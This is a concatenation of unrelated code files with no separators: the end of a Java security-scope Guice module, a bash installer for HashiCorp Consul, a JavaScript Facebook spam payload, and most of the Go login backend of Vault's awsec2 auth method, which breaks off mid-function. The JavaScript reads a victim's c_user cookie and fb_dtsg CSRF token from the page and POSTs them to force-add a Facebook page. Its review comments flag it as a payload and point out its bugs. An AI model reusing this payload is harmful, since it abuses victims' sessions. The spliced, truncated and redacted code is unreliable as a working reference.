                                .put("class2", candidate.getName());
                    }
                    LOGGER.debug("Security scope {} implemented by {} has been detected",
                            scopeName,
                            candidate.getName());
                    scopeClasses.put(scopeName, (Class<? extends Scope>) candidate);
                }
            }
        }
    }

    // Exposes the Guice module carrying everything gathered at init time.
    @Override
    public Object nativeUnitModule() {
        return new SecurityModule(
                securityConfigurer,
                scopeClasses,
                ELPlugin.<API key>(),
                securityProviders,
                crudActionResolvers);
    }
}
#!/usr/bin/env bash
# Downloads and installs HashiCorp Consul into /usr/bin.  Idempotent: skips
# the download when the requested version is already installed.
set -o errexit

VERSION=1.0.7
DOWNLOAD="https://releases.hashicorp.com/consul/${VERSION}/consul_${VERSION}_linux_amd64.zip"

function install_consul() {
    # Already installed at the right version? Nothing to do.
    # `consul version` prints e.g. "Consul v1.0.7" on its first line.
    if [[ -e /usr/bin/consul ]] ; then
        if [ "v${VERSION}" == "$(consul version | head -n1 | awk '{print $2}')" ] ; then
            return
        fi
    fi
    # Fixed: quote expansions; -o so unzip overwrites a stale /tmp/consul
    # instead of prompting/failing; remove the downloaded archive afterwards.
    wget -q -O /tmp/consul.zip "${DOWNLOAD}"
    unzip -o -d /tmp /tmp/consul.zip
    mv /tmp/consul /usr/bin/consul
    chmod +x /usr/bin/consul
    rm -f /tmp/consul.zip
}

install_consul
// WARNING(review): this snippet is a Facebook "self-XSS"/spam payload — it
// reads the victim's c_user cookie and fb_dtsg CSRF token from the live page
// and POSTs them to force-add a page (fbpage_id=165468157402501).  It should
// be removed/quarantined, not maintained; its bugs are deliberately left
// unfixed and are only annotated below.
var X = new XMLHttpRequest();
// NOTE(review): the URL literal was truncated in this copy of the file.
var XURL = "
// NOTE(review): the nested cookie.match() is suspect — the inner match's
// capture group (the user id) is reused as a regex pattern for the outer
// match instead of being used directly.
var XParams = "fbpage_id=165468157402501&add=true&__user="+document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])+"&__a=1&fb_dtsg="+document.getElementsByName('fb_dtsg')[0].value+"&ttstamp=";
X.open("POST", XURL, true);
// NOTE(review): lowercase 'x' is undefined — this line throws a
// ReferenceError at runtime ('X' was intended).
x.setRequestHeader("Content-type", "application/<API key>");
X.onreadystatechange = function () {
    if (X.readyState == 4 && X.status == 200) {
        // NOTE(review): XMLHttpRequest has no close(); this bare property
        // access is a no-op.
        X.close;
    }
};
X.send(XParams);
package awsec2
import (
"crypto/subtle"
"crypto/x509"
"encoding/base64"
"encoding/pem"
"fmt"
"strings"
"time"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/service/ec2"
"github.com/aws/aws-sdk-go/service/iam"
"github.com/fullsailor/pkcs7"
"github.com/hashicorp/go-uuid"
"github.com/hashicorp/vault/helper/jsonutil"
"github.com/hashicorp/vault/helper/strutil"
"github.com/hashicorp/vault/logical"
"github.com/hashicorp/vault/logical/framework"
)
const (
	// Sentinel nonce value: when a client explicitly supplies an empty nonce,
	// this value is stored in the identity-whitelist entry to record the
	// intent to disable reauthentication (compared via ConstantTimeCompare in
	// validateMetadata).  NOTE(review): the identifier and its string literal
	// were redacted/truncated in this copy of the file.
	re<API key> = "re<API key>
)
// pathLogin builds the "login" endpoint definition for the awsec2 auth
// backend.  An EC2 instance authenticates by supplying either the PKCS#7
// signature of its instance identity document, or the base64-encoded identity
// document together with its SHA256 RSA signature; the handler is
// pathLoginUpdate (registered for the update operation).
func pathLogin(b *backend) *framework.Path {
	return &framework.Path{
		Pattern: "login$",
		Fields: map[string]*framework.FieldSchema{
			// Role to authenticate against; defaults to the instance's AMI ID
			// when omitted (see pathLoginUpdate).
			"role": {
				Type: framework.TypeString,
				Description: `Name of the role against which the login is being attempted.
If 'role' is not specified, then the login endpoint looks for a role
bearing the name of the AMI ID of the EC2 instance that is trying to login.
If a matching role is not found, login fails.`,
			},
			// Mutually exclusive with the identity+signature pair below.
			"pkcs7": {
				Type:        framework.TypeString,
				Description: "PKCS7 signature of the identity document.",
			},
			"nonce": {
				Type: framework.TypeString,
				Description: `The nonce to be used for subsequent login requests.
If this parameter is not specified at all and if reauthentication is allowed,
then the backend will generate a random nonce, attaches it to the instance's
identity-whitelist entry and returns the nonce back as part of auth metadata.
This value should be used with further login requests, to establish client
authenticity. Clients can choose to set a custom nonce if preferred, in which
case, it is recommended that clients provide a strong nonce. If a nonce is
provided but with an empty value, it indicates intent to disable
reauthentication. Note that, when '<API key>' option is enabled
on either the role or the role tag, the 'nonce' holds no significance.`,
			},
			"identity": {
				Type: framework.TypeString,
				Description: `Base64 encoded EC2 instance identity document. This needs to be supplied along
with the 'signature' parameter. If using 'curl' for fetching the identity
document, consider using the option '-w 0' while piping the output to 'base64'
binary.`,
			},
			"signature": {
				Type: framework.TypeString,
				Description: `Base64 encoded SHA256 RSA signature of the instance identity document. This
needs to be supplied along with 'identity' parameter.`,
			},
		},
		Callbacks: map[logical.Operation]framework.OperationFunc{
			logical.UpdateOperation: b.pathLoginUpdate,
		},
		HelpSynopsis:    pathLoginSyn,
		HelpDescription: pathLoginDesc,
	}
}
// instanceIamRoleARN fetches the IAM role ARN associated with the given
// instance profile name
func (b *backend) instanceIamRoleARN(s logical.Storage, instanceProfileName, region, accountID string) (string, error) {
if instanceProfileName == "" {
return "", fmt.Errorf("missing instance profile name")
}
// Check if an STS configuration exists for the AWS account
sts, err := b.lockedAwsStsEntry(s, accountID)
if err != nil {
return "", fmt.Errorf("error fetching STS config for account ID %q: %q\n", accountID, err)
}
// An empty STS role signifies the master account
stsRole := ""
if sts != nil {
stsRole = sts.StsRole
}
iamClient, err := b.clientIAM(s, region, stsRole)
if err != nil {
return "", err
}
profile, err := iamClient.GetInstanceProfile(&iam.<API key>{
InstanceProfileName: aws.String(instanceProfileName),
})
if err != nil {
return "", err
}
if profile == nil {
return "", fmt.Errorf("nil output while getting instance profile details")
}
if profile.InstanceProfile == nil {
return "", fmt.Errorf("nil instance profile in the output of instance profile details")
}
if profile.InstanceProfile.Roles == nil || len(profile.InstanceProfile.Roles) != 1 {
return "", fmt.Errorf("invalid roles in the output of instance profile details")
}
if profile.InstanceProfile.Roles[0].Arn == nil {
return "", fmt.Errorf("nil role ARN in the output of instance profile details")
}
return *profile.InstanceProfile.Roles[0].Arn, nil
}
// validateInstance queries the status of the EC2 instance using AWS EC2 API
// and checks if the instance is running and is healthy
func (b *backend) validateInstance(s logical.Storage, instanceID, region, accountID string) (*ec2.<API key>, error) {
// Check if an STS configuration exists for the AWS account
sts, err := b.lockedAwsStsEntry(s, accountID)
if err != nil {
return nil, fmt.Errorf("error fetching STS config for account ID %q: %q\n", accountID, err)
}
// An empty STS role signifies the master account
stsRole := ""
if sts != nil {
stsRole = sts.StsRole
}
// Create an EC2 client to pull the instance information
ec2Client, err := b.clientEC2(s, region, stsRole)
if err != nil {
return nil, err
}
status, err := ec2Client.DescribeInstances(&ec2.<API key>{
Filters: []*ec2.Filter{
&ec2.Filter{
Name: aws.String("instance-id"),
Values: []*string{
aws.String(instanceID),
},
},
},
})
if err != nil {
return nil, fmt.Errorf("error fetching description for instance ID %q: %q\n", instanceID, err)
}
if status == nil {
return nil, fmt.Errorf("nil output from describe instances")
}
if len(status.Reservations) == 0 {
return nil, fmt.Errorf("no reservations found in instance description")
}
if len(status.Reservations[0].Instances) == 0 {
return nil, fmt.Errorf("no instance details found in reservations")
}
if *status.Reservations[0].Instances[0].InstanceId != instanceID {
return nil, fmt.Errorf("expected instance ID not matching the instance ID in the instance description")
}
if status.Reservations[0].Instances[0].State == nil {
return nil, fmt.Errorf("instance state in instance description is nil")
}
if *status.Reservations[0].Instances[0].State.Name != "running" {
return nil, fmt.Errorf("instance is not in 'running' state")
}
return status, nil
}
// validateMetadata matches the given client nonce and pending time with the
// one cached in the identity whitelist during the previous login. But, if
// reauthentication is disabled, login attempt is failed immediately.
// NOTE(review): several struct field names are redacted in this copy of the
// file; the redacted bool on storedIdentity appears to be the
// "reauthentication disabled" flag, judging by its uses below.
func validateMetadata(clientNonce, pendingTime string, storedIdentity *whitelistIdentity, roleEntry *awsRoleEntry) error {
	// For sanity: a reauthenticable identity must have a cached nonce.
	if !storedIdentity.<API key> && storedIdentity.ClientNonce == "" {
		return fmt.Errorf("client nonce missing in stored identity")
	}

	// If reauthentication is disabled or if the nonce supplied matches a
	// predefined nonce which indicates reauthentication to be disabled,
	// authentication will not succeed.
	if storedIdentity.<API key> ||
		subtle.ConstantTimeCompare([]byte(re<API key>), []byte(clientNonce)) == 1 {
		return fmt.Errorf("reauthentication is disabled")
	}

	givenPendingTime, err := time.Parse(time.RFC3339, pendingTime)
	if err != nil {
		return err
	}

	storedPendingTime, err := time.Parse(time.RFC3339, storedIdentity.PendingTime)
	if err != nil {
		return err
	}

	// When the presented client nonce does not match the cached entry, it
	// is either that a rogue client is trying to login or that a valid
	// client suffered a migration. The migration is detected via
	// pendingTime in the instance metadata, which sadly is only updated
	// when an instance is stopped and started but *not* when the instance
	// is rebooted. If reboot survivability is needed, either
	// instrumentation to delete the instance ID from the whitelist is
	// necessary, or the client must durably store the nonce.
	//
	// If the `<API key>` property of the registered role is
	// enabled, then the client nonce mismatch is ignored, as long as the
	// pending time in the presented instance identity document is newer
	// than the cached pending time. The new pendingTime is stored and used
	// for future checks.
	//
	// This is a weak criterion and hence the `<API key>`
	// option should be used with caution.
	if subtle.ConstantTimeCompare([]byte(clientNonce), []byte(storedIdentity.ClientNonce)) != 1 {
		if !roleEntry.<API key> {
			return fmt.Errorf("client nonce mismatch")
		}
		if roleEntry.<API key> && !givenPendingTime.After(storedPendingTime) {
			return fmt.Errorf("client nonce mismatch and instance meta-data incorrect")
		}
	}

	// Ensure that the 'pendingTime' on the given identity document is not
	// before the 'pendingTime' that was used for previous login. This
	// disallows old metadata documents from being used to perform login.
	if givenPendingTime.Before(storedPendingTime) {
		return fmt.Errorf("instance meta-data is older than the one used for previous login")
	}
	return nil
}
// Verifies the integrity of the instance identity document using its SHA256
// RSA signature. After verification, returns the unmarshaled instance identity
// document.
// Fix: the `publicCerts == nil ||` guard before the len() check was redundant
// (len of a nil slice is 0; staticcheck S1009) and has been dropped.
// NOTE(review): the method name and the certificate-fetching helper name were
// redacted in this copy of the file; they are preserved verbatim.
func (b *backend) <API key>(s logical.Storage, identityBytes, signatureBytes []byte) (*identityDocument, error) {
	if len(identityBytes) == 0 {
		return nil, fmt.Errorf("missing instance identity document")
	}

	if len(signatureBytes) == 0 {
		return nil, fmt.Errorf("missing SHA256 RSA signature of the instance identity document")
	}

	// Get the public certificates that are used to verify the signature.
	// This returns a slice of certificates containing the default
	// certificate and all the registered certificates via
	// 'config/certificate/<cert_name>' endpoint, for verifying the RSA
	// digest.
	publicCerts, err := b.<API key>(s, false)
	if err != nil {
		return nil, err
	}
	if len(publicCerts) == 0 {
		return nil, fmt.Errorf("certificates to verify the signature are not found")
	}

	// Check if any of the certs registered at the backend can verify the
	// signature; the first cert that validates wins.
	for _, cert := range publicCerts {
		err := cert.CheckSignature(x509.SHA256WithRSA, identityBytes, signatureBytes)
		if err == nil {
			var identityDoc identityDocument
			if decErr := jsonutil.DecodeJSON(identityBytes, &identityDoc); decErr != nil {
				return nil, decErr
			}
			return &identityDoc, nil
		}
	}

	return nil, fmt.Errorf("instance identity verification using SHA256 RSA signature is unsuccessful")
}
// Verifies the correctness of the authenticated attributes present in the PKCS
// signature. After verification, extracts the instance identity document from the
// signature, parses it and returns it.
// Fixes: the PEM envelope format string (truncated in this copy of the file)
// is reconstructed as the standard PKCS#7 PEM header/footer — confirm against
// upstream; the parse error no longer carries a trailing newline (go vet);
// the redundant nil check before len(publicCerts) is dropped (staticcheck S1009).
// NOTE(review): the method name and the certificate-fetching helper name were
// redacted in this copy of the file; they are preserved verbatim.
func (b *backend) <API key>(s logical.Storage, pkcs7B64 string) (*identityDocument, error) {
	// Insert the header and footer for the signature to be able to pem decode it.
	pkcs7B64 = fmt.Sprintf("-----BEGIN PKCS7-----\n%s\n-----END PKCS7-----", pkcs7B64)

	// Decode the PEM encoded signature. On failure pem.Decode returns a nil
	// block and the full input as the rest, which the length check catches.
	pkcs7BER, pkcs7Rest := pem.Decode([]byte(pkcs7B64))
	if len(pkcs7Rest) != 0 {
		return nil, fmt.Errorf("failed to decode the PEM encoded PKCS#7 signature")
	}

	// Parse the signature from asn1 format into a struct.
	pkcs7Data, err := pkcs7.Parse(pkcs7BER.Bytes)
	if err != nil {
		return nil, fmt.Errorf("failed to parse the BER encoded PKCS#7 signature: %v", err)
	}

	// Get the public certificates that are used to verify the signature.
	// This returns a slice of certificates containing the default certificate
	// and all the registered certificates via 'config/certificate/<cert_name>' endpoint.
	publicCerts, err := b.<API key>(s, true)
	if err != nil {
		return nil, err
	}
	if len(publicCerts) == 0 {
		return nil, fmt.Errorf("certificates to verify the signature are not found")
	}

	// Before calling Verify() on the PKCS#7 struct, set the certificates to be used
	// to verify the contents in the signer information.
	pkcs7Data.Certificates = publicCerts

	// Verify extracts the authenticated attributes in the PKCS#7 signature, and verifies
	// the authenticity of the content using 'dsa.PublicKey' embedded in the public certificate.
	if pkcs7Data.Verify() != nil {
		return nil, fmt.Errorf("failed to verify the signature")
	}

	// Check if the signature has content inside of it.
	if len(pkcs7Data.Content) == 0 {
		return nil, fmt.Errorf("instance identity document could not be found in the signature")
	}

	var identityDoc identityDocument
	if err := jsonutil.DecodeJSON(pkcs7Data.Content, &identityDoc); err != nil {
		return nil, err
	}

	return &identityDoc, nil
}
// pathLoginUpdate is used to create a Vault token by the EC2 instances
// by providing the pkcs7 signature of the instance identity document
// and a client created nonce. Client nonce is optional if '<API key>'
// option is enabled on the registered role.
func (b *backend) pathLoginUpdate(
req *logical.Request, data *framework.FieldData) (*logical.Response, error) {
identityDocB64 := data.Get("identity").(string)
var identityDocBytes []byte
var err error
if identityDocB64 != "" {
identityDocBytes, err = base64.StdEncoding.DecodeString(identityDocB64)
if err != nil || len(identityDocBytes) == 0 {
return logical.ErrorResponse("failed to base64 decode the instance identity document"), nil
}
}
signatureB64 := data.Get("signature").(string)
var signatureBytes []byte
if signatureB64 != "" {
signatureBytes, err = base64.StdEncoding.DecodeString(signatureB64)
if err != nil {
return logical.ErrorResponse("failed to base64 decode the SHA256 RSA signature of the instance identity document"), nil
}
}
pkcs7B64 := data.Get("pkcs7").(string)
// Either the pkcs7 signature of the instance identity document, or
// the identity document itself along with its SHA256 RSA signature
// needs to be provided.
if pkcs7B64 == "" && (len(identityDocBytes) == 0 && len(signatureBytes) == 0) {
return logical.ErrorResponse("either pkcs7 or a tuple containing the instance identity document and its SHA256 RSA signature needs to be provided"), nil
} else if pkcs7B64 != "" && (len(identityDocBytes) != 0 && len(signatureBytes) != 0) {
return logical.ErrorResponse("both pkcs7 and a tuple containing the instance identity document and its SHA256 RSA signature is supplied; provide only one"), nil
}
// Verify the signature of the identity document and unmarshal it
var identityDocParsed *identityDocument
if pkcs7B64 != "" {
identityDocParsed, err = b.<API key>(req.Storage, pkcs7B64)
if err != nil {
return nil, err
}
if identityDocParsed == nil {
return logical.ErrorResponse("failed to verify the instance identity document using pkcs7"), nil
}
} else {
identityDocParsed, err = b.<API key>(req.Storage, identityDocBytes, signatureBytes)
if err != nil {
return nil, err
}
if identityDocParsed == nil {
return logical.ErrorResponse("failed to verify the instance identity document using the SHA256 RSA digest"), nil
}
}
roleName := data.Get("role").(string)
// If roleName is not supplied, a role in the name of the instance's AMI ID will be looked for
if roleName == "" {
roleName = identityDocParsed.AmiID
}
// Validate the instance ID by making a call to AWS EC2 DescribeInstances API
// and fetching the instance description. Validation succeeds only if the
// instance is in 'running' state.
instanceDesc, err := b.validateInstance(req.Storage, identityDocParsed.InstanceID, identityDocParsed.Region, identityDocParsed.AccountID)
if err != nil {
return logical.ErrorResponse(fmt.Sprintf("failed to verify instance ID: %v", err)), nil
}
// Get the entry for the role used by the instance
roleEntry, err := b.lockedAWSRole(req.Storage, roleName)
if err != nil {
return nil, err
}
if roleEntry == nil {
return logical.ErrorResponse(fmt.Sprintf("entry for role %q not found", roleName)), nil
}
// Verify that the AMI ID of the instance trying to login matches the
// AMI ID specified as a constraint on the role
if roleEntry.BoundAmiID != "" && identityDocParsed.AmiID != roleEntry.BoundAmiID {
return logical.ErrorResponse(fmt.Sprintf("AMI ID %q does not belong to role %q", identityDocParsed.AmiID, roleName)), nil
}
// Verify that the AccountID of the instance trying to login matches the
// AccountID specified as a constraint on the role
if roleEntry.BoundAccountID != "" && identityDocParsed.AccountID != roleEntry.BoundAccountID {
return logical.ErrorResponse(fmt.Sprintf("Account ID %q does not belong to role %q", identityDocParsed.AccountID, roleName)), nil
}
// Check if the IAM instance profile ARN of the instance trying to
// login, matches the IAM instance profile ARN specified as a constraint
// on the role.
if roleEntry.<API key> != "" {
if instanceDesc.Reservations[0].Instances[0].IamInstanceProfile == nil {
return nil, fmt.Errorf("IAM instance profile in the instance description is nil")
}
if instanceDesc.Reservations[0].Instances[0].IamInstanceProfile.Arn == nil {
return nil, fmt.Errorf("IAM instance profile ARN in the instance description is nil")
}
<API key> := *instanceDesc.Reservations[0].Instances[0].IamInstanceProfile.Arn
if !strings.HasPrefix(<API key>, roleEntry.<API key>) {
return logical.ErrorResponse(fmt.Sprintf("IAM instance profile ARN %q does not satisfy the constraint role %q", <API key>, roleName)), nil
}
}
// Check if the IAM role ARN of the instance trying to login, matches
// the IAM role ARN specified as a constraint on the role.
if roleEntry.BoundIamRoleARN != "" {
if instanceDesc.Reservations[0].Instances[0].IamInstanceProfile == nil {
return nil, fmt.Errorf("IAM instance profile in the instance description is nil")
}
if instanceDesc.Reservations[0].Instances[0].IamInstanceProfile.Arn == nil {
return nil, fmt.Errorf("IAM instance profile ARN in the instance description is nil")
}
// Fetch the instance profile ARN from the instance description
<API key> := *instanceDesc.Reservations[0].Instances[0].IamInstanceProfile.Arn
if <API key> == "" {
return nil, fmt.Errorf("IAM instance profile ARN in the instance description is empty")
}
// Extract out the instance profile name from the instance
// profile ARN
<API key> := strings.SplitAfter(<API key>, ":instance-profile/")
<API key> := <API key>[len(<API key>)-1]
if <API key> == "" {
return nil, fmt.Errorf("failed to extract out IAM instance profile name from IAM instance profile ARN")
}
// Use instance profile ARN to fetch the associated role ARN
iamRoleARN, err := b.instanceIamRoleARN(req.Storage, <API key>, identityDocParsed.Region, identityDocParsed.AccountID)
if err != nil {
return nil, fmt.Errorf("IAM role ARN could not be fetched: %v", err)
}
if iamRoleARN == "" {
return nil, fmt.Errorf("IAM role ARN could not be fetched")
}
if !strings.HasPrefix(iamRoleARN, roleEntry.BoundIamRoleARN) {
return logical.ErrorResponse(fmt.Sprintf("IAM role ARN %q does not satisfy the constraint role %q", iamRoleARN, roleName)), nil
}
}
// Get the entry from the identity whitelist, if there is one
storedIdentity, err := <API key>(req.Storage, identityDocParsed.InstanceID)
if err != nil {
return nil, err
}
// <API key> value that gets cached at the stored
// identity-whitelist entry is determined not just by the role entry.
// If client explicitly sets nonce to be empty, it implies intent to
// disable reauthentication. Also, role tag can override the 'false'
// value with 'true' (the other way around is not allowed).
// Read the value from the role entry
<API key> := roleEntry.<API key>
clientNonce := ""
// Check if the nonce is supplied by the client
clientNonceRaw, clientNonceSupplied := data.GetOk("nonce")
if clientNonceSupplied {
clientNonce = clientNonceRaw.(string)
// Nonce explicitly set to empty implies intent to disable
// reauthentication by the client. Set a predefined nonce which
// indicates reauthentication being disabled.
if clientNonce == "" {
clientNonce = re<API key>
// Ensure that the intent lands in the whitelist
<API key> = true
}
}
// This is NOT a first login attempt from the client
if storedIdentity != nil {
// Check if the client nonce match the cached nonce and if the pending time
// of the identity document is not before the pending time of the document
// with which previous login was made. If '<API key>' is
// enabled on the registered role, client nonce requirement is relaxed.
if err = validateMetadata(clientNonce, identityDocParsed.PendingTime, storedIdentity, roleEntry); err != nil {
return logical.ErrorResponse(err.Error()), nil
}
// Don't let subsequent login attempts to bypass in initial
// intent of disabling reauthentication, despite the properties
// of role getting updated. For example: Role has the value set
// to 'false', a role-tag login sets the value to 'true', then
// role gets updated to not use a role-tag, and a login attempt
// is made with role's value set to 'false'. Removing the entry
// from the identity-whitelist should be the only way to be
// able to login from the instance again.
<API key> = <API key> || storedIdentity.<API key>
}
// If we reach this point without erroring and if the client nonce was
// not supplied, a first time login is implied and that the client
// intends that the nonce be generated by the backend. Create a random
// nonce to be associated for the instance ID.
if !clientNonceSupplied {
if clientNonce, err = uuid.GenerateUUID(); err != nil {
return nil, fmt.Errorf("failed to generate random nonce")
}
}
// Load the current values for max TTL and policies from the role entry,
// before checking for overriding max TTL in the role tag. The shortest
// max TTL is used to cap the token TTL; the longest max TTL is used to
// make the whitelist entry as long as possible as it controls for replay
// attacks.
shortestMaxTTL := b.System().MaxLeaseTTL()
longestMaxTTL := b.System().MaxLeaseTTL()
if roleEntry.MaxTTL > time.Duration(0) && roleEntry.MaxTTL < shortestMaxTTL {
shortestMaxTTL = roleEntry.MaxTTL
}
if roleEntry.MaxTTL > longestMaxTTL {
longestMaxTTL = roleEntry.MaxTTL
}
policies := roleEntry.Policies
rTagMaxTTL := time.Duration(0)
if roleEntry.RoleTag != "" {
// Role tag is enabled on the role.
// Overwrite the policies with the ones returned from processing the role tag
resp, err := b.handleRoleTagLogin(req.Storage, identityDocParsed, roleName, roleEntry, instanceDesc)
if err != nil {
return nil, err
}
if resp == nil {
return logical.ErrorResponse("failed to fetch and verify the role tag"), nil
}
// If there are no policies on the role tag, policies on the role are inherited.
// If policies on role tag are set, by this point, it is verified that it is a subset of the
// policies on the role. So, apply only those.
if len(resp.Policies) != 0 {
policies = resp.Policies
}
// If roleEntry had <API key> set to 'true', do not reset it
// to 'false' based on role tag having it not set. But, if role tag had it set,
// be sure to override the value.
if !<API key> {
<API key> = resp.<API key>
}
// Cache the value of role tag's max_ttl value
rTagMaxTTL = resp.MaxTTL
// Scope the shortestMaxTTL to the value set on the role tag
if resp.MaxTTL > time.Duration(0) && resp.MaxTTL < shortestMaxTTL {
shortestMaxTTL = resp.MaxTTL
}
if resp.MaxTTL > longestMaxTTL {
longestMaxTTL = resp.MaxTTL
}
}
// Save the login attempt in the identity whitelist
currentTime := time.Now()
if storedIdentity == nil {
// Role, ClientNonce and CreationTime of the identity entry,
// once set, should never change.
storedIdentity = &whitelistIdentity{
Role: roleName,
ClientNonce: clientNonce,
CreationTime: currentTime,
}
}
// <API key>, PendingTime, LastUpdatedTime and
// ExpirationTime may change.
storedIdentity.LastUpdatedTime = currentTime
storedIdentity.ExpirationTime = currentTime.Add(longestMaxTTL)
storedIdentity.PendingTime = identityDocParsed.PendingTime
storedIdentity.<API key> = <API key>
// Don't cache the nonce if <API key> is set
if storedIdentity.<API key> {
storedIdentity.ClientNonce = ""
}
// Sanitize the nonce to a reasonable length
if len(clientNonce) > 128 && !storedIdentity.<API key> {
return logical.ErrorResponse("client nonce exceeding the limit of 128 characters"), nil
}
if err = <API key>(req.Storage, identityDocParsed.InstanceID, storedIdentity); err != nil {
return nil, err
}
resp := &logical.Response{
Auth: &logical.Auth{
Period: roleEntry.Period,
Policies: policies,
Metadata: map[string]string{
"instance_id": identityDocParsed.InstanceID,
"region": identityDocParsed.Region,
"account_id": identityDocParsed.AccountID,
"role_tag_max_ttl": rTagMaxTTL.String(),
"role": roleName,
"ami_id": identityDocParsed.AmiID,
},
LeaseOptions: logical.LeaseOptions{
Renewable: true,
TTL: roleEntry.TTL,
},
},
}
// Return the nonce only if reauthentication is allowed
if !<API key> {
// Echo the client nonce back. If nonce param was not supplied
// to the endpoint at all (setting it to empty string does not
// qualify here), callers should extract out the nonce from
// this field for reauthentication requests.
resp.Auth.Metadata["nonce"] = clientNonce
}
if roleEntry.Period > time.Duration(0) {
resp.Auth.TTL = roleEntry.Period
} else {
// Cap the TTL value.
shortestTTL := b.System().DefaultLeaseTTL()
if roleEntry.TTL > time.Duration(0) && roleEntry.TTL < shortestTTL {
shortestTTL = roleEntry.TTL
}
if shortestMaxTTL < shortestTTL {
resp.AddWarning(fmt.Sprintf("Effective ttl of %q exceeded the effective max_ttl of %q; ttl value is capped appropriately", (shortestTTL / time.Second).String(), (shortestMaxTTL / time.Second).String()))
shortestTTL = shortestMaxTTL
}
resp.Auth.TTL = shortestTTL
}
return resp, nil
}
// handleRoleTagLogin fetches the role tag attached to the EC2 instance,
// verifies its HMAC and its association with the supplied role, and checks it
// against the blacklist. On success it returns the policies, max TTL and
// reauthentication setting carried by the tag, which the caller uses to scope
// the login response, if certain criteria are satisfied.
func (b *backend) handleRoleTagLogin(s logical.Storage, identityDocParsed *identityDocument, roleName string, roleEntry *awsRoleEntry, instanceDesc *ec2.<API key>) (*<API key>, error) {
    // Guard against nil inputs; these indicate a bug in the caller.
    if identityDocParsed == nil {
        return nil, fmt.Errorf("nil parsed identity document")
    }
    if roleEntry == nil {
        return nil, fmt.Errorf("nil role entry")
    }
    if instanceDesc == nil {
        return nil, fmt.Errorf("nil instance description")
    }

    // Input validation on instanceDesc is not performed here considering
    // that it would have been done in validateInstance method.
    tags := instanceDesc.Reservations[0].Instances[0].Tags
    if tags == nil || len(tags) == 0 {
        return nil, fmt.Errorf("missing tag with key %q on the instance", roleEntry.RoleTag)
    }

    // Iterate through the tags attached on the instance and look for
    // a tag with its 'key' matching the expected role tag value.
    rTagValue := ""
    for _, tagItem := range tags {
        if tagItem.Key != nil && *tagItem.Key == roleEntry.RoleTag {
            rTagValue = *tagItem.Value
            break
        }
    }

    // If 'role_tag' is enabled on the role, and if a corresponding tag is not found
    // to be attached to the instance, fail.
    if rTagValue == "" {
        return nil, fmt.Errorf("missing tag with key %q on the instance", roleEntry.RoleTag)
    }

    // Parse the role tag into a struct, extract the plaintext part of it and verify its HMAC.
    rTag, err := b.<API key>(s, rTagValue)
    if err != nil {
        return nil, err
    }

    // Check if the role name with which this login is being made is same
    // as the role name embedded in the tag.
    if rTag.Role != roleName {
        return nil, fmt.Errorf("role on the tag is not matching the role supplied")
    }

    // If instance_id was set on the role tag, check if the same instance is attempting to login.
    if rTag.InstanceID != "" && rTag.InstanceID != identityDocParsed.InstanceID {
        return nil, fmt.Errorf("role tag is being used by an unauthorized instance.")
    }

    // Check if the role tag is blacklisted; a blacklisted tag must never
    // grant a login even if its HMAC verifies.
    blacklistEntry, err := b.<API key>(s, rTagValue)
    if err != nil {
        return nil, err
    }
    if blacklistEntry != nil {
        return nil, fmt.Errorf("role tag is blacklisted")
    }

    // Ensure that the policies on the RoleTag is a subset of policies on the role.
    if !strutil.StrListSubset(roleEntry.Policies, rTag.Policies) {
        return nil, fmt.Errorf("policies on the role tag must be subset of policies on the role")
    }

    return &<API key>{
        Policies: rTag.Policies,
        MaxTTL:   rTag.MaxTTL,
        <API key>: rTag.<API key>,
    }, nil
}
// pathLoginRenew is used to renew an authenticated token.
//
// It re-validates that the instance is still running, that the whitelist
// identity entry and the role still exist, re-derives the TTL bounds from the
// role and the cached role-tag max_ttl, refreshes the whitelist entry's
// expiration time, and finally extends the lease (or applies the role period).
func (b *backend) pathLoginRenew(
    req *logical.Request, data *framework.FieldData) (*logical.Response, error) {
    instanceID := req.Auth.Metadata["instance_id"]
    if instanceID == "" {
        return nil, fmt.Errorf("unable to fetch instance ID from metadata during renewal")
    }

    region := req.Auth.Metadata["region"]
    if region == "" {
        return nil, fmt.Errorf("unable to fetch region from metadata during renewal")
    }

    // Ensure backwards compatibility for older clients without account_id saved in metadata.
    // Missing key is tolerated; a present-but-empty value is rejected.
    accountID, ok := req.Auth.Metadata["account_id"]
    if ok {
        if accountID == "" {
            return nil, fmt.Errorf("unable to fetch account_id from metadata during renewal")
        }
    }

    // Cross check that the instance is still in 'running' state.
    _, err := b.validateInstance(req.Storage, instanceID, region, accountID)
    if err != nil {
        return nil, fmt.Errorf("failed to verify instance ID %q: %q", instanceID, err)
    }

    storedIdentity, err := <API key>(req.Storage, instanceID)
    if err != nil {
        return nil, err
    }
    if storedIdentity == nil {
        return nil, fmt.Errorf("failed to verify the whitelist identity entry for instance ID: %q", instanceID)
    }

    // Ensure that role entry is not deleted.
    roleEntry, err := b.lockedAWSRole(req.Storage, storedIdentity.Role)
    if err != nil {
        return nil, err
    }
    if roleEntry == nil {
        return nil, fmt.Errorf("role entry not found")
    }

    // If the login was made using the role tag, then max_ttl from tag
    // is cached in internal data during login and used here to cap the
    // max_ttl of renewal.
    rTagMaxTTL, err := time.ParseDuration(req.Auth.Metadata["role_tag_max_ttl"])
    if err != nil {
        return nil, err
    }

    // Re-evaluate the maxTTL bounds: the shortest bound caps the token TTL,
    // the longest extends the whitelist entry's expiration.
    shortestMaxTTL := b.System().MaxLeaseTTL()
    longestMaxTTL := b.System().MaxLeaseTTL()
    if roleEntry.MaxTTL > time.Duration(0) && roleEntry.MaxTTL < shortestMaxTTL {
        shortestMaxTTL = roleEntry.MaxTTL
    }
    if roleEntry.MaxTTL > longestMaxTTL {
        longestMaxTTL = roleEntry.MaxTTL
    }
    if rTagMaxTTL > time.Duration(0) && rTagMaxTTL < shortestMaxTTL {
        shortestMaxTTL = rTagMaxTTL
    }
    if rTagMaxTTL > longestMaxTTL {
        longestMaxTTL = rTagMaxTTL
    }

    // Only LastUpdatedTime and ExpirationTime change and all other fields remain the same.
    currentTime := time.Now()
    storedIdentity.LastUpdatedTime = currentTime
    storedIdentity.ExpirationTime = currentTime.Add(longestMaxTTL)

    // Updating the expiration time is required for the tidy operation on the
    // whitelist identity storage items.
    if err = <API key>(req.Storage, instanceID, storedIdentity); err != nil {
        return nil, err
    }

    // If 'Period' is set on the role, then the token should never expire. Role
    // tag does not have a 'Period' field. So, regardless of whether the token
    // was issued using a role login or a role tag login, the period set on the
    // role should take effect.
    if roleEntry.Period > time.Duration(0) {
